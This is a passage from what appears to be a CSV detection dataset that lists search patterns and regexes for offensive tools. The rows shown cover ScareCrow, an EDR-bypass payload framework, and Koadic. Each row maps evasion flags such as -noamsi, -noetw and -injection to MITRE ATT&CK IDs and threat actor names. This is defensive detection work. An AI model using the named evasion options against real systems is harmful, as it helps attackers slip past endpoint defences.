with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","58125" "*ScareCrow *-loader *",".{0,1000}ScareCrow\s.{0,1000}\-loader\s.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58126" "*ScareCrow* -encryptionmode *",".{0,1000}ScareCrow.{0,1000}\s\-encryptionmode\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58127" "*ScareCrow* -Evasion*",".{0,1000}ScareCrow.{0,1000}\s\-Evasion.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - 
Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58128" "*ScareCrow* -Exec*",".{0,1000}ScareCrow.{0,1000}\s\-Exec.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil 
- RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58129" "*ScareCrow* -injection*",".{0,1000}ScareCrow.{0,1000}\s\-injection.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58130" "*ScareCrow* -Loader * ",".{0,1000}ScareCrow.{0,1000}\s\-Loader\s.{0,1000}\s","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58131" "*ScareCrow* -noamsi*",".{0,1000}ScareCrow.{0,1000}\s\-noamsi.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - 
Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58132" "*ScareCrow* -noetw*",".{0,1000}ScareCrow.{0,1000}\s\-noetw.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58133" "*ScareCrow* -obfu*",".{0,1000}ScareCrow.{0,1000}\s\-obfu.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58134" "*ScareCrow*_darwin_amd64*",".{0,1000}ScareCrow.{0,1000}_darwin_amd64.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic 
Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","#linux","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58135" "*ScareCrow*_windows_amd64.exe*",".{0,1000}ScareCrow.{0,1000}_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - 
Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58136" "*ScareCrow*KnownDLL*",".{0,1000}ScareCrow.{0,1000}KnownDLL.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass 
- Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58137" "*ScareCrow*ProcessInjection*",".{0,1000}ScareCrow.{0,1000}ProcessInjection.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58138" 
"*ScareCrow*windows_amd64.exe*",".{0,1000}ScareCrow.{0,1000}windows_amd64\.exe.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58139" "*ScareCrow.cna*",".{0,1000}ScareCrow\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads integration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","N/A","10","10","462","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z","58140" "*ScareCrow.go*",".{0,1000}ScareCrow\.go.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","58141" "*ScareCrow/Cryptor*",".{0,1000}ScareCrow\/Cryptor.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 
